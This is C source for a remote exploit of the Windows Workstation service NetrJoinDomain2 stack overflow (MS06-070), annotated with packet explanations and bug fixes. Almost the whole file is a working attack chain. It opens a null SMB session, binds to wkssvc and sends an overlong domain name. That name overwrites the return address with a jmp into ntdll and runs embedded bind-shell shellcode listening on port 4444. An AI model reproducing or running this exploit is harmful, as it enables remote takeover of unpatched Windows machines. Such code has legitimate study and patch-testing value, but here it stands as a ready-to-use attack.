# Title : MS Windows NetpManageIPCConnect Stack Overflow Exploit (MS06-070)
# Published : 2006-11-16
# Author : cocoruder
/***************************************************************************
Microsoft Windows Wkssvc NetrJoinDomain2 Stack Overflow(MS06-070) Exploit
by cocoruder(frankruder_at_hotmail.com),2006.11.15
page:http://ruder.cdut.net/default.asp
successfully tested on Windows 2000 Server SP4 (Chinese)
usage:
ms06070 targetip DomainName
notice:
Make sure the DomainName is a valid, live domain. For more information see
http://research.eeye.com/html/advisories/published/AD20061114.html.
cocoruder only researched the vulnerability and provides the exploit for
Win2000 (the ntdll.dll return address below was chosen for that target).
****************************************************************************/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>
#include <winsock.h>
#include <tchar.h>
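/* SMB_COM_NEGOTIATE (command byte 0x72) offering the single dialect
 * "NT LM 0.12".  Bytes 0-3 are the NetBIOS session header: 0x2f = 47 bytes
 * of SMB follow, which is exactly what the 51-byte literal below contains.
 * The archive copy had lost the backslash of every "\x" escape, turning
 * each byte into a three-character run; the escapes are restored so that
 * sizeof(SmbNeg)-1 (used as the send length in neg()) matches the length
 * field again. */
unsigned char SmbNeg[] =
"\x00\x00\x00\x2f\xff\x53\x4d\x42\x72\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x88\x05\x00\x00\x00\x00\x00\x0c\x00\x02\x4e\x54"
"\x20\x4c\x4d\x20\x30\x2e\x31\x32\x00";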
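/* SMB_COM_SESSION_SETUP_ANDX (0x73), NetBIOS length 0x48 = 72 (+4 = the 76
 * bytes below).  Both password lengths are zero and the account / domain
 * strings are empty, i.e. an anonymous (null) session; the native OS /
 * LAN manager strings are "nt" and "pysmb".  The reply's UID (header
 * offset 0x20) is what main() copies into the later requests.
 * "\x" escapes restored (the archive copy had dropped the backslashes). */
unsigned char Session_Setup_AndX_Request[]=
"\x00\x00\x00\x48\xff\x53\x4d\x42\x73\x00"
"\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\xff\xff\x88\x05\x00\x00\x00\x00\x0d\xff\x00\x00\x00\xff"
"\xff\x02\x00\x88\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x01\x00\x00\x00\x0b\x00\x00\x00\x6e\x74\x00\x70\x79\x73\x6d"
"\x62\x00";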
unsigned char TreeConnect_AndX_Request[]=
"x00x00x00x58xffx53x4dx42x75x00"
"x00x00x00x18x07xc8x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00xffxfex00x08x00x03x04xffx00x58x00x08"
"x00x01x00x2dx00x00x5cx00x5cx00x31x00x37x00x32x00"
"x2ex00x32x00x32x00x2ex00x35x00x2ex00x34x00x36x00"
"x5cx00x49x00x50x00x43x00x24x00x00x00x3fx3fx3fx3f"
"x3fx00";
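/* SMB_COM_NT_CREATE_ANDX (0xa2), NetBIOS length 0x64 = 100 (+4 = 104
 * bytes).  Opens the named pipe "\wkssvc" (UTF-16, NameLength 0x0e = 14
 * bytes) on the IPC$ tree; the reply's FID (offset 0x2a) is then used as
 * the transaction pipe handle.  main() patches the UID (0x20) and TID
 * (0x1c) into the header before sending.
 * "\x" escapes restored (the archive copy had dropped the backslashes). */
unsigned char NTCreate_AndX_Request[]=
"\x00\x00\x00\x64\xff\x53\x4d\x42\xa2\x00"
"\x00\x00\x00\x18\x07\xc8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x08\x04\x0c\x00\x08\x00\x01\x18\xff\x00\xde\xde\x00"
"\x0e\x00\x16\x00\x00\x00\x00\x00\x00\x00\x9f\x01\x02\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x01\x00"
"\x00\x00\x40\x00\x40\x00\x02\x00\x00\x00\x01\x11\x00\x00\x5c\x00"
"\x77\x00\x6b\x00\x73\x00\x73\x00\x76\x00\x63\x00\x00\x00";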
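/* SMB_COM_TRANSACTION (0x25) / TransactNmPipe (setup[0] = 0x26) carrying a
 * DCERPC bind (ptype 0x0b, frag length 0x48 = 72) to the wkssvc interface
 * 6bffd098-a112-3610-9833-46c3f87e345a v1.0 with the NDR transfer syntax
 * 8a885d04-1ceb-11c9-9fe8-08002b104860 v2.  The pipe name here is the
 * ASCII "\PIPE\".  NetBIOS length 0x92 = 146 (+4 = 150 bytes); main()
 * recomputes that field anyway and patches UID (0x20), TID (0x1c) and the
 * FID in setup[1] (0x43).
 * "\x" escapes restored (the archive copy had dropped the backslashes). */
unsigned char Rpc_Bind_Wkssvc[]=
"\x00\x00\x00\x92\xff\x53\x4d\x42\x25\x00"
"\x00\x00\x00\x18\x01\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x01\x08\xf0\x0b\x03\x08\xf7\x4c\x10\x00\x00\x48\x00\x00"
"\x04\xe0\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x4a"
"\x00\x48\x00\x4a\x00\x02\x00\x26\x00\x01\x40\x4f\x00\x5c\x50\x49"
"\x50\x45\x5c\x00\x05\x00\x0b\x03\x10\x00\x00\x00\x48\x00\x00\x00"
"\x00\x00\x00\x00\xd0\x16\xd0\x16\x00\x00\x00\x00\x01\x00\x00\x00"
"\x00\x00\x01\x00\x98\xd0\xff\x6b\x12\xa1\x10\x36\x98\x33\x46\xc3"
"\xf8\x7e\x34\x5a\x01\x00\x00\x00\x04\x5d\x88\x8a\xeb\x1c\xc9\x11"
"\x9f\xe8\x08\x00\x2b\x10\x48\x60\x02\x00\x00\x00";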
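/* Fixed prefix of the attack transaction: SMB_COM_TRANSACTION (0x25) /
 * TransactNmPipe with a Unicode "\PIPE\" name, followed at offset 0x58 by a
 * DCERPC request (ptype 0, call id 1) for opnum 0x16 = 22, NetrJoinDomain2.
 * The stub data so far holds the first string parameter (ServerName, a
 * referent id plus a 14-unit conformant varying UTF-16 "\\172.22.5.41" --
 * again the author's lab address, not argv[1]) and the MaxCount / Offset /
 * ActualCount triple of the second string, into which MakeAttackPacket()
 * appends the over-long DomainName.  MakeAttackPacket() overwrites the
 * MaxCount (offset 0x9c) and ActualCount (0xa4) fields in place, and main()
 * patches UID/TID/FID plus every length field (NetBIOS, TotalDataCount at
 * 0x27, DataCount at 0x3b, ByteCount at 0x45, RPC frag length at 0x60).
 * 168 bytes, matching the 0xa8 in its NetBIOS header.
 * "\x" escapes restored (the archive copy had dropped the backslashes). */
unsigned char Rpc_NetrJoinDomain2_Header[]=
"\x00\x00\x00\xa8\xff\x53\x4d\x42\x25\x00"
"\x00\x00\x00\x18\x07\xc8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x08\x6c\x07\x00\x08\xc0\x01\x10\x00\x00\x54\x00\x00"
"\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x54"
"\x00\x54\x00\x54\x00\x02\x00\x26\x00\x00\x40\x65\x00\x00\x5c\x00"
"\x50\x00\x49\x00\x50\x00\x45\x00\x5c\x00\x00\x00\x00\x00\x05\x00"
"\x00\x03\x10\x00\x00\x00\x54\x00\x00\x00\x01\x00\x00\x00\x3c\x00"
"\x00\x00\x00\x00"
"\x16\x00" /* opnum 22, NetrJoinDomain2 */
"\x30\x2a\x42\x00" /* ServerName referent id */
"\x0e\x00\x00\x00" /* ServerName MaxCount (UTF-16 units) */
"\x00\x00\x00\x00" /* ServerName Offset */
"\x0e\x00\x00\x00" /* ServerName ActualCount */
"\x5c\x00\x5c\x00\x31\x00\x37\x00\x32\x00"
"\x2e\x00\x32\x00\x32\x00\x2e\x00\x35\x00\x2e\x00\x34\x00\x31\x00"
"\x00\x00"
"\x10\x01\x00\x00" /* DomainName MaxCount -- rewritten by MakeAttackPacket */
"\x00\x00\x00\x00" /* DomainName Offset */
"\x10\x01\x00\x00"; /* DomainName ActualCount -- rewritten by MakeAttackPacket */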
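/* Trailer appended after the DomainName string and its terminator: four
 * little-endian DWORDs 0, 0, 0, 1.  Presumably the remaining NetrJoinDomain2
 * parameters (three null unique pointers and the Options value); this file
 * does not name them, so treat that reading as unconfirmed.
 * "\x" escapes restored (the archive copy had dropped the backslashes). */
unsigned char Rpc_NetrJoinDomain2_End[]=
"\x00\x00\x00\x00"
"\x00\x00\x00\x00"
"\x00\x00\x00\x00"
"\x01\x00\x00\x00";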
/* UTF-16 copy of the DomainName argument, with its terminator turned into a
 * trailing "\\", and its byte length.  Both are produced by MakeAttackPacket();
 * nothing else writes them. */
unsigned char *lpDomainName = NULL;
DWORD          dwDomainNameLen = 0;
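/* win32_bind - EXITFUNC=seh LPORT=4444 Size=344 Encoder=PexFnstenvSub
http://metasploit.com */
/* 344 bytes, matching the generator's Size= above; the listener port is the
 * 4444 that main() tells the user to telnet to.  The opening bytes
 * (d9 ee d9 74 24 f4 5b) look like the fnstenv GetPC stub the encoder name
 * implies, with the encoded payload after it -- this file carries no
 * decoded form, so nothing more is asserted about what it does.
 * "\x" escapes restored (the archive copy had dropped the backslashes);
 * without them sizeof(shellcode)-1 was three times the real length and the
 * packet layout computed in MakeAttackPacket() was wrong. */
unsigned char shellcode[] =
"\x2b\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x6e"
"\xd2\x50\xd3\x83\xeb\xfc\xe2\xf4\x92\xb8\xbb\x9e\x86\x2b\xaf\x2c"
"\x91\xb2\xdb\xbf\x4a\xf6\xdb\x96\x52\x59\x2c\xd6\x16\xd3\xbf\x58"
"\x21\xca\xdb\x8c\x4e\xd3\xbb\x9a\xe5\xe6\xdb\xd2\x80\xe3\x90\x4a"
"\xc2\x56\x90\xa7\x69\x13\x9a\xde\x6f\x10\xbb\x27\x55\x86\x74\xfb"
"\x1b\x37\xdb\x8c\x4a\xd3\xbb\xb5\xe5\xde\x1b\x58\x31\xce\x51\x38"
"\x6d\xfe\xdb\x5a\x02\xf6\x4c\xb2\xad\xe3\x8b\xb7\xe5\x91\x60\x58"
"\x2e\xde\xdb\xa3\x72\x7f\xdb\x93\x66\x8c\x38\x5d\x20\xdc\xbc\x83"
"\x91\x04\x36\x80\x08\xba\x63\xe1\x06\xa5\x23\xe1\x31\x86\xaf\x03"
"\x06\x19\xbd\x2f\x55\x82\xaf\x05\x31\x5b\xb5\xb5\xef\x3f\x58\xd1"
"\x3b\xb8\x52\x2c\xbe\xba\x89\xda\x9b\x7f\x07\x2c\xb8\x81\x03\x80"
"\x3d\x81\x13\x80\x2d\x81\xaf\x03\x08\xba\x41\x8f\x08\x81\xd9\x32"
"\xfb\xba\xf4\xc9\x1e\x15\x07\x2c\xb8\xb8\x40\x82\x3b\x2d\x80\xbb"
"\xca\x7f\x7e\x3a\x39\x2d\x86\x80\x3b\x2d\x80\xbb\x8b\x9b\xd6\x9a"
"\x39\x2d\x86\x83\x3a\x86\x05\x2c\xbe\x41\x38\x34\x17\x14\x29\x84"
"\x91\x04\x05\x2c\xbe\xb4\x3a\xb7\x08\xba\x33\xbe\xe7\x37\x3a\x83"
"\x37\xfb\x9c\x5a\x89\xb8\x14\x5a\x8c\xe3\x90\x20\xc4\x2c\x12\xfe"
"\x90\x90\x7c\x40\xe3\xa8\x68\x78\xc5\x79\x38\xa1\x90\x61\x46\x2c"
"\x1b\x96\xaf\x05\x35\x85\x02\x82\x3f\x83\x3a\xd2\x3f\x83\x05\x82"
"\x91\x02\x38\x7e\xb7\xd7\x9e\x80\x91\x04\x3a\x2c\x91\xe5\xaf\x03"
"\xe5\x85\xac\x50\xaa\xb6\xaf\x05\x3c\x2d\x80\xbb\x9e\x58\x54\x8c"
"\x3d\x2d\x86\x2c\xbe\xd2\x50\xd3";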
/* Overflow geometry and the overwrite value.
 *
 * fill_len_1  - bytes of 0x90 between the DomainName and the jmp stub
 *               (MakeAttackPacket() subtracts 3*2 from it); presumably it
 *               spans the vulnerable stack frame up to the saved return
 *               address, but that distance is not derivable from this file.
 * fill_len_2  - bytes of 0x41 padding after the shellcode.
 * addr_jmp_ebx - absolute address stored over the return address; the
 *               author describes it as a "jmp ebx" inside ntdll.dll on the
 *               Windows 2000 Server SP4 (Chinese) build this was tested on.
 *               ntdll addresses differ between builds and service packs, so
 *               this constant is the first thing to re-derive for any other
 *               target.
 */
DWORD fill_len_1   = 0x084C;      /* fill data */
DWORD fill_len_2   = 0x1000;      /* fill rubbish data */
DWORD addr_jmp_ebx = 0x77F81573;  /* jmp ebx address, in ntdll.dll */
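/* Four-byte stub placed just before the return-address slot: EB 06 is a
 * short jump six bytes past its own end, i.e. over the two trailing NOPs
 * and the 4-byte addr_jmp_ebx that follows, landing on the shellcode (hence
 * the author's "jmp 8": eight bytes from the start of the stub).
 * "\x" escapes restored (the archive copy had dropped the backslashes);
 * without them sizeof(code_jmp8)-1 was 12 and MakeAttackPacket() copied 12
 * bytes into a 4-byte slot. */
unsigned char code_jmp8[]= /* jmp 8 */
"\xEB\x06\x90\x90";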
/* The assembled NetrJoinDomain2 transaction (heap, built by
 * MakeAttackPacket()) and its byte length, plus the single 2 KiB buffer
 * main() reuses for every server reply. */
unsigned char *Rpc_NetrJoinDomain2 = NULL;
DWORD          dwRpc_NetrJoinDomain2 = 0;
unsigned char  recvbuff[2048];
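/* Print the banner and usage text to stdout.
 *
 * The "\n" escapes had been stripped from the archive copy (and one printf
 * had been wrapped across two lines, splitting "see\n"); they are restored
 * here.  The date printed (2006.10.15) differs from the one in the file
 * header (2006.11.15); both are left as published. */
void showinfo(void)
{
    printf("Microsoft Windows Wkssvc NetrJoinDomain2 Stack Overflow(MS06-070) Exploit\n");
    printf("by cocoruder(frankruder_at_hotmail.com),2006.10.15\n");
    printf("page:http://ruder.cdut.net/default.asp\n\n");
    printf("successfully test on Windows 2000 Server SP4(chinese)\n\n");
    printf("usage:\n");
    printf("ms06070 targetip DomainName\n\n");
    printf("notice:\n");
    printf("Make sure the DomainName is valid and live,more informations see\n");
    printf("http://research.eeye.com/html/advisories/published/AD20061114.html,\n");
    printf("cocoruder just research the vulnerability and give the exploit for Win2000.\n\n\n");
}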
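/* Send the SMB_COM_NEGOTIATE request (SmbNeg) on socket `s`.
 *
 * The reply is not read here; main() drains it and uses nothing from it --
 * the exploit assumes "NT LM 0.12" is accepted.  A send failure is reported
 * on stdout but not otherwise signalled, matching the caller's best-effort
 * style.  The original also declared and zeroed a 1 KiB local buffer it
 * never used; that dead code is removed. */
void neg ( int s )
{
    if (send(s, (char *)SmbNeg, sizeof(SmbNeg) - 1, 0) <= 0)
    {
        printf("send SmbNeg error!\n");
    }
}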
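/* Build the NetrJoinDomain2 transaction into the global Rpc_NetrJoinDomain2
 * (length in dwRpc_NetrJoinDomain2).  After Rpc_NetrJoinDomain2_Header the
 * buffer holds, in order:
 *
 *   DomainName, UTF-16, NUL replaced by "\\"     dwDomainNameLen bytes
 *   0x90 filler (from the initial memset)         fill_len_1 - 3*2 bytes
 *   code_jmp8                                     4
 *   addr_jmp_ebx (little-endian)                  4
 *   shellcode                                     344
 *   0x41 filler                                   fill_len_2
 *   UTF-16 NUL terminator                         2 (3 if the total was odd)
 *   Rpc_NetrJoinDomain2_End                       16
 *
 * The MaxCount / ActualCount of the DomainName string parameter (header
 * offsets 0x9c and 0xa4) are rewritten in the header template with the
 * UTF-16 unit count of everything from the name to the terminator, so the
 * server copies the whole run as one string.
 *
 * Session-dependent fields (UID/TID/FID) and the SMB/NetBIOS/RPC length
 * fields are NOT filled in here; main() patches them.
 *
 * Failure (either allocation, or the ANSI->UTF-16 conversion) leaves
 * Rpc_NetrJoinDomain2 == NULL and dwRpc_NetrJoinDomain2 == 0 so the caller
 * can tell.  The original returned silently with a NULL pointer but a
 * non-zero length, and main() then dereferenced the NULL.  It also passed
 * the buffer's byte length as MultiByteToWideChar's cchWideChar, which is a
 * count of wide characters; that is corrected too. */
void MakeAttackPacket(char *lpDomainNameStr)
{
    DWORD j, len, b_flag;
    int converted;

    Rpc_NetrJoinDomain2 = NULL;
    dwRpc_NetrJoinDomain2 = 0;

    /* Room for the name, its NUL and one spare UTF-16 unit; the two 0x5C
     * stores below turn the NUL and the spare unit into "\\". */
    dwDomainNameLen = (strlen(lpDomainNameStr) + 2) * 2;
    lpDomainName = (unsigned char *)malloc(dwDomainNameLen);
    if (lpDomainName == NULL)
    {
        printf("malloc error!\n");
        return;
    }
    memset(lpDomainName, 0, dwDomainNameLen);
    converted = MultiByteToWideChar(CP_ACP, 0, lpDomainNameStr, -1,
                                    (LPWSTR)lpDomainName, dwDomainNameLen / 2);
    if (converted == 0)
    {
        printf("MultiByteToWideChar error!\n");
        free(lpDomainName);
        lpDomainName = NULL;
        return;
    }
    /* For single-byte input the NUL sits at dwDomainNameLen-4; overwrite it
     * and the spare unit with L'\\' so the string runs on into the filler. */
    lpDomainName[dwDomainNameLen - 2] = 0x5C;
    lpDomainName[dwDomainNameLen - 4] = 0x5C;

    len = dwDomainNameLen +             /* DomainName            */
          fill_len_1 - 3 * 2 +          /* 0x90 filler           */
          4 +                           /* jmp stub              */
          4 +                           /* addr_jmp_ebx          */
          sizeof(shellcode) - 1 +       /* shellcode             */
          fill_len_2 +                  /* 0x41 filler           */
          2;                            /* UTF-16 terminator     */
    b_flag = 0;
    if (len % 2 == 1)
    {
        /* Keep the UTF-16 region an even number of bytes. */
        len++;
        b_flag = 1;
    }

    dwRpc_NetrJoinDomain2 = sizeof(Rpc_NetrJoinDomain2_Header) - 1 +
                            len +
                            sizeof(Rpc_NetrJoinDomain2_End) - 1;
    Rpc_NetrJoinDomain2 = (unsigned char *)malloc(dwRpc_NetrJoinDomain2);
    if (Rpc_NetrJoinDomain2 == NULL)
    {
        printf("malloc error!\n");
        dwRpc_NetrJoinDomain2 = 0;
        return;
    }
    /* Everything not written explicitly below stays 0x90. */
    memset(Rpc_NetrJoinDomain2, 0x90, dwRpc_NetrJoinDomain2);

    j = sizeof(Rpc_NetrJoinDomain2_Header) - 1;
    /* DomainName MaxCount / ActualCount, in UTF-16 units. */
    *(DWORD *)(Rpc_NetrJoinDomain2_Header + j - 0x0c) = len / 2;
    *(DWORD *)(Rpc_NetrJoinDomain2_Header + j - 0x04) = len / 2;
    memcpy(Rpc_NetrJoinDomain2, Rpc_NetrJoinDomain2_Header, j);

    memcpy(Rpc_NetrJoinDomain2 + j, lpDomainName, dwDomainNameLen);
    j += dwDomainNameLen;
    j += fill_len_1 - 3 * 2;            /* 0x90 filler, already in place */

    memcpy(Rpc_NetrJoinDomain2 + j, code_jmp8, sizeof(code_jmp8) - 1);
    j += 4;
    *(DWORD *)(Rpc_NetrJoinDomain2 + j) = addr_jmp_ebx;
    j += 4;
    memcpy(Rpc_NetrJoinDomain2 + j, shellcode, sizeof(shellcode) - 1);
    j += sizeof(shellcode) - 1;
    memset(Rpc_NetrJoinDomain2 + j, 0x41, fill_len_2);
    j += fill_len_2;

    /* UTF-16 NUL that finally ends the string (one extra pad byte when the
     * odd-length adjustment above fired). */
    Rpc_NetrJoinDomain2[j] = 0x00;
    Rpc_NetrJoinDomain2[j + 1] = 0x00;
    j += 2;
    if (b_flag == 1)
    {
        Rpc_NetrJoinDomain2[j] = 0x00;
        j += 1;
    }

    memcpy(Rpc_NetrJoinDomain2 + j, Rpc_NetrJoinDomain2_End, sizeof(Rpc_NetrJoinDomain2_End) - 1);
}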
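/* Check a server reply before a header field is read from it at a fixed
 * offset: `got` is recv()'s return value, `need` the number of bytes the
 * caller is about to touch.  Also insists on the "\xffSMB" signature at
 * offset 4 (right behind the 4-byte NetBIOS session header) so that an
 * unexpected reply is not parsed as one. */
static int smb_reply_ok(int got, int need)
{
    if (got < need)
    {
        return 0;
    }
    return memcmp(recvbuff + 4, "\xffSMB", 4) == 0;
}

/* Entry point: ms06070 <targetip> <DomainName>
 *
 * Sequence: TCP/445 -> Negotiate -> Session Setup (null session) ->
 * Tree Connect IPC$ -> NT Create \wkssvc -> DCERPC bind to wkssvc ->
 * the over-long NetrJoinDomain2 request built by MakeAttackPacket().
 * UID, TID and FID are lifted from the replies at fixed offsets and patched
 * into the following request templates; the length fields of the final
 * request are recomputed from dwRpc_NetrJoinDomain2 (0x58 is where the RPC
 * PDU starts inside the SMB, 0x47 where the SMB data bytes start).
 *
 * As published, the unconditional `return` straight after showinfo() stops
 * the program before it touches the network.  It is kept on purpose.
 *
 * Fixes relative to the original: argc is checked before argv is used;
 * socket()/connect()/send() results are tested against the Winsock error
 * values (SOCKET is unsigned and ret was a DWORD, so `sock<=0` and `ret<=0`
 * could never detect INVALID_SOCKET or SOCKET_ERROR); each reply is checked
 * for length and signature before a field is read out of it; a NULL from
 * MakeAttackPacket() is handled instead of dereferenced; socket, Winsock and
 * the two heap buffers are released on every exit path; main returns int.
 *
 * Caveats for a retargeting reader: the IPC$ path in
 * TreeConnect_AndX_Request and the ServerName in Rpc_NetrJoinDomain2_Header
 * are hard-coded 172.22.5.x addresses, not argv[1]; no SMB status code is
 * examined, so a rejected session/tree connect is only noticed when the
 * reply is too short to carry the field being read. */
int main(int argc, char **argv)
{
    WSADATA ws;
    struct sockaddr_in server;
    SOCKET sock;
    int ret;
    int rc = 1;
    WORD userid, treeid, fid;

    showinfo();
    /* Published early exit: nothing below runs until this line is removed. */
    return 0;

    if (argc < 3)
    {
        printf("missing arguments, usage: ms06070 targetip DomainName\n");
        return 1;
    }
    if (WSAStartup(MAKEWORD(2, 2), &ws) != 0)
    {
        printf("WSAStartup error!\n");
        return 1;
    }
    sock = socket(AF_INET, SOCK_STREAM, 0);
    if (sock == INVALID_SOCKET)
    {
        printf("socket error!\n");
        goto out_wsa;
    }

    memset(&server, 0, sizeof(server));
    server.sin_family = AF_INET;
    server.sin_addr.s_addr = inet_addr(argv[1]);
    if (server.sin_addr.s_addr == INADDR_NONE)
    {
        printf("invalid target address %s\n", argv[1]);
        goto out_sock;
    }
    server.sin_port = htons((USHORT)445);
    printf("[+] Connecting %s\n", argv[1]);
    if (connect(sock, (struct sockaddr *)&server, sizeof(server)) == SOCKET_ERROR)
    {
        printf("connect error!\n");
        goto out_sock;
    }

    /* Negotiate: the reply is drained, nothing in it is used. */
    neg(sock);
    if (recv(sock, (char *)recvbuff, sizeof(recvbuff), 0) <= 0)
    {
        printf("no Negotiate response\n");
        goto out_sock;
    }

    /* Session Setup AndX: UID at header offset 0x20 of the reply. */
    ret = send(sock, (char *)Session_Setup_AndX_Request, sizeof(Session_Setup_AndX_Request) - 1, 0);
    if (ret <= 0)
    {
        printf("send Session_Setup_AndX_Request error!\n");
        goto out_sock;
    }
    ret = recv(sock, (char *)recvbuff, sizeof(recvbuff), 0);
    if (!smb_reply_ok(ret, 0x22))
    {
        printf("bad Session_Setup_AndX response\n");
        goto out_sock;
    }
    userid = *(WORD *)(recvbuff + 0x20);                         /* get userid */
    memcpy(TreeConnect_AndX_Request + 0x20, (char *)&userid, 2); /* update userid */

    /* Tree Connect AndX: TID at header offset 0x1c of the reply. */
    ret = send(sock, (char *)TreeConnect_AndX_Request, sizeof(TreeConnect_AndX_Request) - 1, 0);
    if (ret <= 0)
    {
        printf("send TreeConnect_AndX_Request error!\n");
        goto out_sock;
    }
    ret = recv(sock, (char *)recvbuff, sizeof(recvbuff), 0);
    if (!smb_reply_ok(ret, 0x1e))
    {
        printf("bad TreeConnect_AndX response\n");
        goto out_sock;
    }
    treeid = *(WORD *)(recvbuff + 0x1c);                         /* get treeid */

    /* NT Create AndX on \wkssvc: FID at offset 0x2a of the reply. */
    memcpy(NTCreate_AndX_Request + 0x20, (char *)&userid, 2);    /* update userid */
    memcpy(NTCreate_AndX_Request + 0x1c, (char *)&treeid, 2);    /* update treeid */
    ret = send(sock, (char *)NTCreate_AndX_Request, sizeof(NTCreate_AndX_Request) - 1, 0);
    if (ret <= 0)
    {
        printf("send NTCreate_AndX_Request error!\n");
        goto out_sock;
    }
    ret = recv(sock, (char *)recvbuff, sizeof(recvbuff), 0);
    if (!smb_reply_ok(ret, 0x2c))
    {
        printf("bad NTCreate_AndX response\n");
        goto out_sock;
    }
    fid = *(WORD *)(recvbuff + 0x2a);                            /* get fid */

    /* DCERPC bind over the pipe; the bind_ack is drained, not parsed. */
    memcpy(Rpc_Bind_Wkssvc + 0x20, (char *)&userid, 2);
    memcpy(Rpc_Bind_Wkssvc + 0x1c, (char *)&treeid, 2);
    memcpy(Rpc_Bind_Wkssvc + 0x43, (char *)&fid, 2);
    *(DWORD *)Rpc_Bind_Wkssvc = htonl(sizeof(Rpc_Bind_Wkssvc) - 1 - 4);
    ret = send(sock, (char *)Rpc_Bind_Wkssvc, sizeof(Rpc_Bind_Wkssvc) - 1, 0);
    if (ret <= 0)
    {
        printf("send Rpc_Bind_Wkssvc error!\n");
        goto out_sock;
    }
    if (recv(sock, (char *)recvbuff, sizeof(recvbuff), 0) <= 0)
    {
        printf("no bind response\n");
        goto out_sock;
    }

    /* NetrJoinDomain2 request: fill in session ids, recompute lengths. */
    MakeAttackPacket((char *)argv[2]);
    if (Rpc_NetrJoinDomain2 == NULL)
    {
        printf("MakeAttackPacket failed\n");
        goto out_sock;
    }
    memcpy(Rpc_NetrJoinDomain2 + 0x20, (char *)&userid, 2);
    memcpy(Rpc_NetrJoinDomain2 + 0x1c, (char *)&treeid, 2);
    memcpy(Rpc_NetrJoinDomain2 + 0x43, (char *)&fid, 2);
    *(DWORD *)Rpc_NetrJoinDomain2 = htonl(dwRpc_NetrJoinDomain2 - 4);                /* NetBIOS length   */
    *(WORD *)(Rpc_NetrJoinDomain2 + 0x27) = (WORD)(dwRpc_NetrJoinDomain2 - 0x58);  /* Total Data Count */
    *(WORD *)(Rpc_NetrJoinDomain2 + 0x3b) = (WORD)(dwRpc_NetrJoinDomain2 - 0x58);  /* Data Count       */
    *(WORD *)(Rpc_NetrJoinDomain2 + 0x45) = (WORD)(dwRpc_NetrJoinDomain2 - 0x47);  /* Byte Count       */
    *(WORD *)(Rpc_NetrJoinDomain2 + 0x60) = (WORD)(dwRpc_NetrJoinDomain2 - 0x58);  /* RPC Frag Length  */
    ret = send(sock, (char *)Rpc_NetrJoinDomain2, dwRpc_NetrJoinDomain2, 0);
    if (ret <= 0)
    {
        printf("send Rpc_NetrJoinDomain2 error!\n");
        goto out_sock;
    }
    printf("[+] Send attack packet successfully.telnet %s:4444?\n", argv[1]);
    recv(sock, (char *)recvbuff, sizeof(recvbuff), 0);
    rc = 0;

out_sock:
    closesocket(sock);
out_wsa:
    WSACleanup();
    free(Rpc_NetrJoinDomain2);
    free(lpDomainName);
    return rc;
}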